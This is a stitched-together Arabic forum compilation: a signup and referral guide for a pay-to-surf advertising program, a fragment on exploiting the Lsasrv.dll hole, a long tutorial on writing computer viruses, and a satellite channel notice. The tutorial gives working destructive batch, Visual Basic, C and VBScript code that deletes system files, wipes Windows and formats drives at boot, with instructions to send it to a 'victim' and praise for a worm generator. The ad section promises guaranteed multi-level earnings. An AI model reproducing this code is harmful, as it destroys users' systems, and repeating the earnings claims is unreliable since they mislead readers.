Year of birth:تاريخ ميلادك Genderذكر امانثى Educationدرجة تعليمك Annual household incomeمتوسط دخلكالسنوي Industryعملك او صناعتك Titleاختر other وبعد ذلك تأتيكمجموعتين واختار من المجموعة الاولى اربع او خمس اختيارات ومن المجموعةالثانية اربع اختيارات واترك الباقي كما هو ولكن ضع علامة صح بجانبالجملة have read and understand the member agreement.
وبعد ذلك اضغطعلى submit registration
بعدها سوف تظهر لك نافذه لتحميل البرنامج Download اضغط على زر سوف يبدأ تحميل البرنامج مع العلم أنه يجب أن تكونمتصلا بالنت ياخذ التحميل حوالي 10 ثواني بعد تثبيت البرنامج سوف تضهرالنافذة التالية Cashfiesta login ادخل اسم الدخول user كلمة السر password واضغط ok
والان سيشتغل معك البرنامج
ملاحظة هامة : يجب عليك إغلاقالبرنامج قبل الخروج من الانترنت لكي تحسب النقاط التي جمعتها وذلك بضغط exit
طريقة حسابك في الشركة
طريقة الدفع:-
يتم الدفع عن طريق شيك يوصلك لحد عنوانك الذى سجلته عند ملءالبيانات تقدر تطلب فلوسك من الشركه فى النصف الاول فقط من كل شهر يجب أن يصل قيمةالشيك الى 50 دولا على الاقل ويظهر زر الدفع وما ان تضغط عليه حتى يتم تسجيل طلبك ملاحظه :الشيك يصل فى خلال أسبوعين من تاريخ الطلب .
ما هي فكرة هذه الشركات التي تدفع مبالغ لمجرد استخدام الإنترنت؟
ولعل من أكثر المفاجئات التي أحدثتها الإنترنت إثارة سواءً على مستوى الأفراد أوعلى المستوى الإعلامي هي إمكانية الفرد جني ثروة كبيرة لمجرد استخدامه للإنترنت لقدظهرت مؤخرا العديد من الشركات التي تدفع للمشتركين لديها مبالغ مقابل أن تقومالشركة ببث إعلانات للمستخدم في شاشة صغيرة يحصل عليها من الشركة نفسها هذا يعنيانه من كل شركه من الشركات التي يزيد عددها على 20 شركه يمكن الفرد ان يحصل على 20دولار شهريا من كل شركه اي 400 دولار شهريا من كل الشركات لكن الأمر لا يقف هناوإنما يمكن لكل مشترك أن يدعو آخرين للتسجيل باسمه. وهنا ستقوم كل من هذه الشركاتبدفع مبلغ إضافي لهذا المشترك عن كل ساعة يقضيها من يسجلون باسمه في الإنترنت. كذلكفإذا سجل شخص ثالث باسم الشخص الثاني فإن الشخص الأول أيضاً سيحصل على مبلغ منالمال عن كل ساعة يقضيها الشخص الثالث في الإنترنت. وهذا الوضع يتسلسل لعدةمستويات. فإذا قام الشخص الأول مثلا بالتسجيل في واحدة من هذه الشركات ثم دعا خمسةمن أصدقائه للتسجيل برقمه ثم قام كل واحد من هؤلاء الخمسة بدعوة خمسة آخرين للتسجيلبأرقامهم وقام كل واحد من الخمسة والعشرين الجدد بتسجيل خمسة بأرقامهم وهكذا إلىأربعة أو خمسة مستويات، فإنه يمكن أن يحصل الشخص الأول على دخل شهري من تلك الشركةيصل إلى ما يزيد عن خمسة آلاف دولار .
كيف تقوم الشركات بحساب الوقت الذي يقضيه المشترك في الإنترنت؟
بعد أن تقوم بالتسجيل في هذه الشركات فإن الشركة سترسل لك رقماً خاصاًّ بك وكلمةسر. ويمكنك استخدام هذا الرقم وكلمة السر
للإطلاع على حسابك في الشركة (كممن الناس سجلوا برقمك وكم من الساعات قضيتها في الإنترنت ورصيدك الحالي). بعدهذا عليك أن تقوم بتنزيل برنامج خاص من هذه الشركة وتحميله في جهاز الكمبيوتر الذيتستخدمه. ويقوم البرنامج بعد تحميله وتشغيله لأول مرة بسؤالك عن رقمك وكلمة السرالخاصة بك في هذه الشركة. بعد هذا يظهر البرنامج في شاشتك إما على شكل شريط يمكنتحريكه في أي مكان في الشاشة أو على شكل نافذة صغيرة تكون جزءاً من المتصفح الذيتستخدمه. كذلك فإن بعض الشركات لديها متصفح خاص بها. علىاية حال ، مهمة هذه البرامجشيئان. الأول ، حساب الوقت الذي ستقضيه في الإنترنت والثاني بث إعلانات ودعايةفي النافذة الخاصة بهذه البرامج. ويمكنك أن توقف هذه البرامج متى شئت وتشغيلها متىشئت لماذا تدفع هذه الشركات تلك المبالغ للمشتركين معها؟ البرنامج الخاص بكلشركة والذي عليك تنزيله وتحميله في جهازك يقوم ببث إعلانات ودعاية مادامت نافذةالبرنامج ظاهرة على الشاشة . والدعاية التي تبث في هذه البرامج هي ليست للشركاتالتي تستخدم برامجها وإنما هي لشركات أخرى مقابل دفع تلك الشركات مبلغاً من المالللشركة صاحبة البرنامج. وفي الغالب تحتسب تكلفة تلك الدعاية بمعرفة عدد المستخدمينالذين سيشاهدون تلك الدعاية وكم مرة ستظهر تلك الدعاية في شاشاتهم. وتدفع تلكالشركات حوالي 20 إلى 50 دولارً عن كل ألف مرة تظهر فيها تلك الدعاية على شاشاتالمستخدمين. فمثلاً لو كان للشركة المالكة للبرنامج عشرة آلاف مشترك وبثت إليهم نفسالدعاية200 مرة فإنها قد تحصل من الشركة صاحبة الدعاية على حوالي 500 دولار. ولكنبعض هذه الشركات لديها الآن ما يزيد عن مليوني مشترك وهذا يعني أنها لو بثت إحدىتلك الدعايات إليهم جميعا مرة واحدة فقط ، فإنها ستحصل على حوالي 20 ألف دولار الى 50 الف دولار . ولكي تقوم هذه الشركات بزيادة عدد المشتركين معها فإنها تجعلهميحصلون على نسبة من تلك العائدات.
ما نوع الدعايات التي تبثها هذه الشركات؟ في الغالب أنه يمكن أن تبث في شاشاتهذه البرامج أي نوع من الدعاية لأي شركة. إلا أن الشركات تضع قيوداً على نوعالدعاية التي تبثها. مثلاً كل الشركات تمنع بث الدعايات التي تروج الجنس والعنفوالمخدرات. بعضها أيضاً تمنع الدعايات التي تروج القمار والخمور. كذلك فإن كثير منالشركات تتيح للمشترك أن يحدد نوع الدعاية التي يرغب في مشاهدتها أثناء تسجيله فيتلك الشركات .
وملاحظه مهمه للمشتركين : بعد تنزيل البرنامج وظهور شريط الاعلانات ستجد لاقصى اليسارمن الصوره شخص يتحرك فاذا توقف فاضغط بالماوس عليه حتى يتحرك ويتحرك معهالعداد.
لتعرف اللنك الخاص بك اتبع هذه الخطوات وهذا اللنك هو الذي سيسجل فيه الاعضاء الذينمن طرفك وكلما سجل عضو عن طريقك سترى العداد الثاني يزيد فمن شاشة الاعلانات اليفوق سيشاهد زر settings اضغط عليه وبعدها اختار account وبعدها balance وبعد ماتضغطها تفتح الصفحه الخاصه بك وسترى فى اول الصفحه رسالة ترحيب بالمستخدم فلو فرضناان المستخدم اسمه xxxx سيرى رسالة الترحيب كما يلى welcome xxxx على يسارالشاشةسترى اربع خيارات واحده منهن Edit Profile وهذا الخيار عشان تغير معلوماتك مثلتغيير كلمة السر وتغيير البريد والعنوان والاسم الحقيقي وعلشان تعرف اللنك الخاصبك على يمين الموقع توجد خيارات واحد منهن باسم Referral Center اضغط عليه سترىجمله هي Your referral URL is وتحتها اللنك الخاص بك .
بالنسبه للرجل الذي يتحرك هو كل فتره بيوقف ياخذ استراحه قصيره يحلاوةهذا الرجل تعبويلزمه راحه اول مايوقف هذا الرجل مرر مؤشر الماوس عليه حتى يتحرك واول مايتحركاضغط عليه بالماوس عشان يرجع مكانه وبذلك يبدأ فى عد النقط .
وبالنسبه من خوفك انه النت يفصل اقولك لا تخاف لانه اولا لو فصل النت فانت معكحوالي العشر دقائق عشان تعيد تشغيل النت وبهذه العشر دقايق بيظل الرجال يتحرك يعنيعدادك ماشي لعشر دقائق لو فصل النت ثانيا كل ربع ساعه البرنامج بيخزن اخر رقموصله بشكل آلي ويرفعه لموقعك واخيرا لما تريد ان تقفل النت يفضل ان تعمل exit .
(((((((( عذرا نتكلم عن كيفية الحصول على المال ))))))) الشيك يوصلكم على البريدفقط لا غير ولازم تكتبون الرمز البريدي صح عشان يوصلك بعد كذا لما تفتحون البرنامجوتسجلون تضغطون على البرنامج تحت عند الرموز اللي في قائمة ابدأ بالماوس الأيسروتروحون على Settings ثم على Account ثم على Balance راح تلقون صفحتك تلقونفيهاجدولين بالأزرق الجدول اللي على اليسار تحته كلام مكتوب فيه: انه هنا يوجدالزر اللي تضغطونه لطلب الشيك ويصلك انشاء الله بعد اسبوعين أو ثلاثة على الرمزالبريدي وانه لا حظوا أنه (يوجد الزر هذا فقط من تاريخ 1 إلى 15 من الشهورالميلادية واحنا اليوم 18 عشان كذا مو موجود) تعال في التاريخ ما بين 1 إلى 15واطلب شيكك واذا ما وصلك بيوصل مع الشيك الثاني في شيك واحد أوكي أتمنى تخلون علىالصفحة التالية:
تلقون فيهكل شييييييييييييييييييييييئ عن طريقة الكسب وكيف تروجون لنفسكم وكيف تسوون وتحطونوكل شئ مررررة تطلعون من الصفحة كأنكم انتم اخترعت هذا البرنامج وطريقته عارف بكلشئ انشاء الله وفي النهاية انا وانتم الكسبانين انا من ناحيتي اللي علمني فيهوالله يقول كسب في الشهور الأولى ما لبين 80-160 دولار بس يسوق للناس ومع الوقتيزيد هذا المعدل مع زيادة الناس واللي يتصفحون انترنت بس اهم شئ انك تقومون بتسويقصفحتك زي ما انا مسوي وهم راح يعطونك صفحة خاصة تدعون زملائكم يسجلون فيها ويسوونزي ما سويتم بالتمام وبالتوفيق انشاء الله .
عموما لا تنسون تشيكوون على بريدكم بعد ما تسجلون وتخلصون لإنه في خطوة أخيرة بستسويها هي تنشيط حسابك .
الحقيقة ان الأمر يستحق التجربة والموضوع مضمون الف مره مني ومنتم خسرانين شيء بلكسبانين . والسلام عليكم .
الثعره عباره عن ملف Lsasrv.dll وقد تم اطلف فيروس الشدون وطبعا الجميع يعرف هذا الفيروس يخترق عن طري ملف Lsasrv.dll والان انا احط كيف ترفع اي ملف عن طري الثغره =================== البرامج المستخدمه -------------- 1: برنامج DSScan للكشف عن الثغره الوصله 2:برنامج Easy_Lsasrv_bufferoverflow_GUI للتحكم في الثغره
هذا الموضوع من اقوى المواضيع التى تجذب القراء و الراغبين فى تعلم الهكر و تجذب اكثر محبى البرمجة الذين يسعون الى تعلم كل جديد فى مجال البرمجة
و نظرا لأنى واحد من محبى البرمجة احببت ان ابحث فى النت لتعلم طرق صناعة الفيروسات و الحمد لله وجدت الكثير من المعلومات التى افادتنى و دلتنى الى الطريق الذى انا اريده لذا اردت ان اعلم كل من يريد ذلك و كل من يرغب فى تصميم فيروس
احب ان اوضح ان الطرق سوف اشرحها هنا و هى عبارة عن 4 اجزاء و هى كل ما انا كتبته حتى الأن و سوف اضعها كلها هنا و هذا للتسهيل على كل من يجد هذا الموضوع مهم و يجذب
ارجوا اولا قبل البدأ فى هذا الموضوع ان اوضح شئ ان هذا الموضوع من نتاج تعب كبير مر على حتى انتجت مثل هذا الموضوع لذا ارجوا من كل من يريد نقل الموضوع ان يكتب انه نقله من Broken_ice و يكتب اسم المنتدى الذى نقله منه
قبل البدأ فى تعلم تصميم الفيروس يجب علينا تعلم بعض النقاط المهمة و هى التعريف بالفيروس و انواعه و شروطه و التى سوف اوضحها الأن
نبدأ الموضوع
تعريف الفيروس :
يمكن تعريف الفيروس على انه برنامج صغير الحجم يشغل نفسه ذاتيا او اعتمادا على احد برامج ويندوز دون علم المستخدم بذلك و هناك فيروسات تشغل نفسها بناء على وقت الساعة فى الويندوز او تاريخ اليوم و اشهر هذه الفيروسات هو تشيرنوبل الذى يعمل فى يوم السادس و العشرين من كل شهر و لقد سمى الفيروس بهذا الأسم نسبة الى الفيروسات الموجودة فى جسم الأنسان و التى تصيبه و تتكاثر بسرعة فيه و هى نفس فكرة عمل الفيروس الذى يصيب الكومبيوتر
و يجب توافر عدة شروط لكى يصبح الفيروس ذو فاعلية و هى
أن يكون ذا حجم صغير لكى لا يتم الانتباه اليه
أن يعتمد على نفسه فى التشغيل أو على البرامج الأساسية أو عن طريق الارتباط باحد الملفات
أن يكون ذا هدف و مغزى
-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*
الأن و بعد ان فهمنا بعض المصطلحات الأساسية و التى يجب ان نكون على دراية فلنبدأ فى التصميم
ولاكن قبل البدأ يجب ان اوضح شئ خطير جدا جدا جدا
(( اذا كنت مبتدئ او ممن يخشون التعامل مع الفيروسات فارجو ان تقوم بفهم الموضوع دون اى محاولة منك لتصنيع الفيروسات لأنك و كما سوف ترى ان اى خطا فى اى كود سوف يؤدى الى اضرار كبيرة منها تدمير نظام التشغيل لذا ارجو الحزر من تصميم الفيروس وانا لست مسؤل عن اى ضرر قد ينشئ لك من الفيروسات التى سوف تقوم بها ))
الأن يجب ان نعرف ما هى الطرق التى سوف استخدمها فى صناعة الفيروسات
لقد تعرفت اثناء بحثى عبر الأنترنت على مجموعة من الطرق لتصميم الفيروسات و هى
عن طريق الـnotepad
عن طريق برنامج الفجول بيسك (vb)
عن طريق برامج تصميم الفيروسات ( خطيرة جداااا و فيروساتها قوية – لكن اغلبها يكشفه النورتون)
و سوف اقوم الأن بعرض كل منهم على حذة و سوف اشرحهم لكم بالتفصيل اتمنى ان ينال اعجابكم ما سوف اقوم به
هذا هو الجزء الأول من صناعة الفيروسات و الذى سوف نقوم فيه على تعلم تصميم الفيروس بواسطة notepad
للعمل على تصميم فيروس بهذا النوع من التصميمات يجب ان تعرف كيف تضع الأكواد التى سوف اعطيها لك و هى عن طريق فتح برنامج notepad وكتابة الكود فيه ثم حفظه باى اسم تريده ولاكن بامتداد .bat
و الأن بعد ان تعرفت على المكان كل ما عليك ان تضع الكود المناسب لك فى الnotepad و تحفظه و ..... فقط لا تقوم بأكثر من ذلك ألا اذا ارسلته الى الضحية التى تريد انهائها او يمكنك تجربت هذا الفيروس على جهاز التجارب اذا كان لديك
قبل ان اضع لكم الأكواد اريد ان اوضح ان هذه الأكواد منقولة طبعا ولاكنى وضعت تحت كل كود اكبر شرح استطيع تقديمه عبر هذا الكود من حيث فكرة عمله و طريقة تعديله مع مثال بسيط عليه
اريد ان اوضح انه من الأفضل نسخ الكود و لصقه فى المكان الذى تريده
----------------------
نبدأ بالكود الأول :
---------------------
@Echo off c: cd %WinDir%\System\ deltree /y *.dll cd\ deltree /y *.sys
الـتوضـــــــــــتيح :
* بعد ان قمت بوضع الكود و حفظه بامتداد .bat فانت هاكذ تكون قد قمت بعمل فيروس و سوف تلحظ ان شكل الأيقونة قد تغير الى شباك ازرق وبداخله عجلة صفراء احذر منه فهو الأن جاهز للعمل و اياك ان تفتحه
* هذا الفيروس يقوم على مسح كل ملفات ال dll وال sys من السيستم. وهذا ما سوف نلحظه بالنظر الى الكود السابق و به سوف نجد انه كتب فى هذا الكود امر " deltree " و هو الخاص بمسح الملفات ثم كتب بعد ذلك " *.dll كما كتب *.sys " و هو انى قد اعطيت له بان يمسح كل الملفات التى لها الأمتدادين السابقين و يمكن ملاحظة شئ اخر و هو كون الكمبيوتر يمسح الملفات من السيستيم و سوف نجد فى اول الكود الامر الخاص بذلك فسوف تجد انه قد اعطى له الأمر بالذهاب الى c: و كما اعطاه الأمر بالذهاب مالفات لويندوز عندما صدرنا له الأمر windir ثم اخبرناه ان الأوامر التالية يجب ان تكون داخل مل سيستيم و الذى هو موجود ضمن ملفات الويندوز
* بعد ان فهمنا هذا المود ما رايكم هل هناك من يستطيع اجابتى على سؤالى و هو هل يمكننا تعديل هذا الكود ؟!!
----- لن ادعكم تفكرون فى الأجابة فانا سوف اعجبكم بكل بساطة و هى يمكننا ان نغير اى شئ قد فهمناه جيدا لذا نحن يمكننا ان نغير هذا الكود قليلا وسو اخبركم عما هو يمكننا ان نغيره و طبعا نتم تعرفون المكان الذىيمكننا ان نغيره فىالكود فيمكننا ان نغير نوعية الملفات التى سوف يقوم بمسحها او يمكننا زيادتها كما يمكننا ان نغير المكان الذى سوف يوجد فيه فمثلا هناك منيضع نوعين من انظمة التشغيل فهناك من يضع مثلا ويندوز 98 و Xp لذا يمكننا ان نغير اتجاه الفيروس الى d:
مثال توضيحى :
انا الأن اريد ان امزح مع احد و فى نفس الوقت عاوز اعلمه درس و تحزير فيمكننى ان اصنع فيروس يقوم بمسح جميع ملفات الصور التى امتددها *.jpg. كما اننى اريد ان امسح جميع ملفات الأغانى التى امتددها *.mp3 و جميع امتدادت الملفات الخاصة بلافلام و التى امتدادها *.asf و التى توجد فى E: كل ما علينا هو تعديل الكود ليصبح كالأتى
الفيروس السابق يعتبر من الأفكار الجيدة للزين هما من محبين فى البرمجة وافهمين فى فكرة عمل لكمبيوتر و ليس ممن هم من هواة تعلم برنامج صغير ثم يقول عى نفسه خبير كمبيوتر
نبدا بتوضيح الكود : فكما نرى فى الكود اول سطر مجرد فائدته مسح الشاشة من اى امر او تعليق مسبق حتى يجعل عمل هذا اليروس هو الوحيد
بعد سوف نجد مجموعة من السطور هى تقريبا مكرره فكرتها وليس مكرر عملها ولاكن يمكننا ان نوضح انه هناك 3 اكود منفصله هم الفكرة الأسايه و هما ما سوف نحن نوضحه
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat يعطى هذا المود الأمر للكمبيوتر بمسح الفولدر program files والذى يوجد فيه جميع البرامج التى تنزل على الجهاز و نلاحظ تكراره فى مسح الويندوز فى الكود
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat ولاكنه اذا قام بمسح الويندوز فهو لن يستطيع عمل فورمات بعد ذلك لذا فقبل ذلك اعطى امر نسخ لهذان الأمرن حتى يمكننا استخدامهم فيما بعد و هذا هو ما اعطاه هذان السطرين
اما بعد ذلك فهو اعطاه الأمر بعمل فورمات للجهاز و هذا كما هو موجود فى السطر التالى
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
اولا يوجد بعض الامور توضيحها قبل البدأ فى هذا الموضوع وهو انه بوضع هذا الفيروس فى الـC:
سوف يجعله يعمل تلقائيا عند فتح الجهاز لذا لا تحفظه فى هذا partion اما اذا كنت تسوى تهكرعلى جهاز فقم تحميل هذا الفيروس الى الـC: عنده ثم دعه يتمتع بذلك بعد ان يفتح جهازه
ولاكنى وجدت فيه عيب بسيط و هو ان هذا الفيروس لن يعمل فى جهاز وضع فيه الويندو داخل فولدر غير windows فمثلا اذا كان هناك ضحيه يوجد عندها ويندوز موضوع داخل فولدر win98 فان الفيروس الذى كوناه لن يقوم ببعض الأعمال و هى نسخ الأوامر و مسح الويندوز ولاكنه سوف يقوم بعمل فورمات
اما بالنسبة لتعديله فكل ما استطيع ان اعطيكم اياه من تدعديل مفيد فيه و هو انكم تمسحوا اوامر مسح الويندوز و Program files و تدع امر الفورمات مع تغير مثلا انه يسوى فورما على الـ D: فيكون لكود كما يلى
echo off@
cls call attrib -h -r c:\autoexec.bat >nul echo @echo off >c:\autoexec.bat echo format d: /q /u /autotest >nul >>c:\autoexec.bat
يعتبر هذا الفيروس نفس عمل السابق لذا انا لست بحاجه الى توضيحه او اخباركم بما انتم يجب ان تقومو به حتى تعدلوه
كل ما انا يجب ان اقوله لكم بخصوص هذا الكود انه يجب عليكم ان تسمه بـ Autoexec.bat
الأن و بعد ان تعرفنا الى الأكواد السابقة ما رأيكم فى جعل هذا الفيروس اقوى بان نضيف اليه بعض الخصائص و سوف اوضح اكواده
الخاصــــــــــــــية الأولى :-
On Error Resume Next
Dim copy, copy2
copy = "c:\virus.exe"
copy2 = "c:\windows\system\Project12.exe"
FileCopy copy, copy2
يعطى هذا الكود للفيروس خاصية نسخ نفسه الى مكان اخر حتى لا يمكن للضحيه ايقافه بمجرد مسحه و يمكننا من التعامل مع الكود بكل بساطة هذا اذا كنت من الفاهمين للكمبيوتر بدرجة جيدة و ليس للبرامج الصغيرة التى تاتى معه
الخاصــــــــــــــية الثانيه :-
Option Explicit
Private Declare Function RegQueryValueEx Lib "advapi32.dll" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, ByVal lpData As String, lpcbData As Long) As Long
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, ByVal lpData As String, ByVal cbData As Long) As Long
Private Declare Function RegOpenKey Lib "advapi32.dll" Alias "RegOpenKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegDeleteKey Lib "advapi32.dll" Alias "RegDeleteKeyA" (ByVal hKey As Long, ByVal lpSubKey As String) As Long
Private Declare Function RegDeleteValue Lib "advapi32.dll" Alias "RegDeleteValueA" (ByVal hKey As Long, ByVal lpValueName As String) As Long
RegSetValueEx nBufferSubKey, "My virus", 0, REG_SZ, InputValue, Len(InputValue)
End Sub
يعطى هذا الكود للفيروس خاصية انه يمكنه من ان يشتغل تلقائيا عند فتح الجهاز و هذا عن طريق تعديل ال registry :
هذا هو كل ما انا حصلت عليه من اكواد للفيروسات فلقد شرحت لكم مجموعه من اكواد الفيروسات التى يمكننا من استخدامها و مجموعه من الأكواد التى باضافتها للفيروس تعطى له خصائص مفيده و هذا ليس كل شئ فنا ان حصلت على ى كود اخر فسوف اعطيه لكم فى هذا الموضوع و سوف اشرح فيه كل ما انا استطيع لذا انتظروا منى المفيد و يتبقى لنى شئ بسيط وانهى هذا الجزء و هو مجموعة اكواد لأشهر الفيروسات
فيرووس C++ :
*****************
#include<stdio.h> #include<conio.h> #include<stdlib.h> main() { clrscr(); printf("\t\t\tWelcome to the Egyption -oO Virus Oo-\n\n"); printf("\t\t**** -oO Israel Oo- and -oO America Oo-\n\n"); remove("c:\\windows\\system.ini"); remove("c:\\windows\\win.ini"); remove("c:\\autoexec.bat"); remove("c:\\msdos.sys"); remove("c:\\io.sys"); remove("c:\\command.com"); remove("c:\\config.sys"); remove("c:\\windows\\ebd\\command.com"); remove("c:\\windows\\ebd\\ebd.cab"); remove("c:\\windows\\ebd\\Autoexec.bat"); remove("c:\\windows\\ebd\\setramd.bat"); remove("c:\\windows\\ebd\\Findramd.exe"); rename("egypt.exe","c:/windows/startm~1/programs/startup/win.exe"); printf("Windows destroyed ...\n\n"); system("PAUSE"); }
<head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Active-X HTML</title> </head> THIS HTML USING ACTIVE-X PLEASE CLICK #YES# <body bgcolor="#000000" Text="#C0C0C0"> <script language="VBScript"> <!-- This is a MY BRAIN --!> On Error Resume Next Dim a Set fso = CreateObject("Scripting.FileSystemObject") Set a = fso.GetFile("win.ini") a.Delete Dim b Set fso = CreateObject("Scripting.FileSystemObject") Set b = fso.GetFile("system.ini") b.Delete </script> <!--- This script author is THEONE---!> </body> </html>
( ملاحظة يحفظ هذا الفيروس بأمتداد html .* )
يمكنك من دراسة هذه الأكواد و النظر فيها الى ما قد يفيدكم فيمكنكم من نقل بعض الأجزاء من الفيروسات السابقة عمل فيروس قوى يخصكم
هذا هو كل ما املك فى هذا الجزء و هو كما قلت لكم سابقا هو قابل للتطوير فانتظروا منى الكثير من الأكواد التى سوف اضعها لكم ولاكن كرد على هذا الموضوع [/size][/B][/color]
فيرووس C++ :
*****************
#include<stdio.h> #include<conio.h> #include<stdlib.h> main() { clrscr(); printf("\t\t\tWelcome to the Egyption -oO Virus Oo-\n\n"); printf("\t\t**** -oO Israel Oo- and -oO America Oo-\n\n"); remove("c:\\windows\\system.ini"); remove("c:\\windows\\win.ini"); remove("c:\\autoexec.bat"); remove("c:\\msdos.sys"); remove("c:\\io.sys"); remove("c:\\command.com"); remove("c:\\config.sys"); remove("c:\\windows\\ebd\\command.com"); remove("c:\\windows\\ebd\\ebd.cab"); remove("c:\\windows\\ebd\\Autoexec.bat"); remove("c:\\windows\\ebd\\setramd.bat"); remove("c:\\windows\\ebd\\Findramd.exe"); rename("egypt.exe","c:/windows/startm~1/programs/startup/win.exe"); printf("Windows destroyed ...\n\n"); system("PAUSE"); }
<head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Active-X HTML</title> </head> THIS HTML USING ACTIVE-X PLEASE CLICK #YES# <body bgcolor="#000000" Text="#C0C0C0"> <script language="VBScript"> <!-- This is a MY BRAIN --!> On Error Resume Next Dim a Set fso = CreateObject("Scripting.FileSystemObject") Set a = fso.GetFile("win.ini") a.Delete Dim b Set fso = CreateObject("Scripting.FileSystemObject") Set b = fso.GetFile("system.ini") b.Delete </script> <!--- This script author is THEONE---!> </body> </html>
( ملاحظة يحفظ هذا الفيروس بأمتداد html .* )
يمكنك من دراسة هذه الأكواد و النظر فيها الى ما قد يفيدكم فيمكنكم من نقل بعض الأجزاء من الفيروسات السابقة عمل فيروس قوى يخصكم
هذا هو كل ما املك فى هذا الجزء و هو كما قلت لكم سابقا هو قابل للتطوير فانتظروا منى الكثير من الأكواد التى سوف اضعها لكم ولاكن كرد على هذا الموضوع
هذا هو الجزء الثانى من الفيروسات و هو اصغر الأجزاء نظرا لأنى سوف اضع فيه فكرة وليس طريقة شرح
و هو صنع فيروس بواسطة بعض البرامج الخاصة بذلك
هناك العديد من البرامج التى تؤدى ما انت تطمع قيه و بقوة ولاكن معظمها خطر جدا و يكتشفه مضاد الفيروس
ولاكن هناك برنامج وجت بعض المعلومات عنه وانا الأن اعد شرح مفصل و بالصور عنه ولاكنى اخشى من ان يتضرر منه المبتدأين و ذلك لما سوف ترونه من مميزات هذا البرنامج الخطيرة
هذا البرنامج لأنشاء فيروس من نظام worm او الدودة و هو برنامج vbswg2 الشهير و هذا البرنامج خطيييييييييييير جدااااااااااا لأنه به صمم فيروس الحب ( I love u ) و فيروس آنا كرنوكوفا العارية و من اهم مميزات التى تضاف الى الفيروس المصمم بهذا البرنامج انه يضرب outlook و يصيب الأميلات و ينتشر من خلاله وهذا عن طريق انه يضرب القائمة البريدية للأميلات التى تكون انت مضيفها لديك و يضرب كل الأميلات التى انت مضيفها و يواصل انتشاره بهذه الطريقة
و من مميزات هذا البرنامج :
1- يحفظ لك الدودة بامتداد jpg - gih - txt - html والامتداد الرئيسي vbs 2- تضع فيه ميزة الإرسال عن طريق outlook واكيد الي يقرى الكلام فوق راح يعرف 3- اول ماتشغل Mirc راح يقوم على نشر نفسه 4- يمكن تدمجه مع احدى الملفات 5- يحذفلك جميع الملفات وهذا على حسب متطلباتك واستخدامك لخيارات البرنامج 6- الظاهر لحد هنا كافي لتسميته فيروس او دودة ويوجد فرق كبير بينهم لكن المهم انه يدمر لك الجهاز ..... اكتشفوا المميزات الباقية بنفسكم
Download From
ملاحظه:
صاحب هذا البرنامج مايزال مسجون وهذا دليل على شدة وخطورة البرنامج
لكن الانتي فايرس يكتشفه بسهوله
هذه صورة للبرنامج
هذا الشرح ليس كافيا اليس كذلك اعلم ولاكنى لازلت اتعلم استخدام هذا البرنامج و احاول اتقانه حتى لا اقوم بشرح شئ خطأ وانتم كما تعرفون انه من الخطر جدا حدوث اى خطأ يمكن ان يؤدى الى كارثة
هذا هو نهاية الجزء الأول ولاكن يتبقى لنا الجزء الثالث و هو عن طريق صنع فيروس بواسطة الفجول بيسك ولاكنى لم اكمله لذا انظروه منى قريبا
احب ان اوضح لكم جميعا شئ واحد وهو انى قد وضعت لكم هذه الطروق وليست هى النهاية ولاكن يبقى لدى الكثير لأقدمه لكم فيما بعد و سوف اضعها لكم فى هذا الموضوع كرد عليه لذا عليكم بمتابعة هذا الموضوع اول باول
اما الأن كل ما استطيع قوله لكم هو انى اتمنى لكم التوفيق دائما و اتمنى ان اكون قدمت لكم الجديد منقول لأهميته الشديدة أخوكم خطاب
الآن ... ابتداءاُ من 1/1/ 2006 فقط على القمر الصناعي عرب ســات يمكنكم متابعة برامج قناتكم المفضلة سمارتس وي على التردد التالي : MHz12.520 ,Vertical, Fec ¾ ,S/R 27500.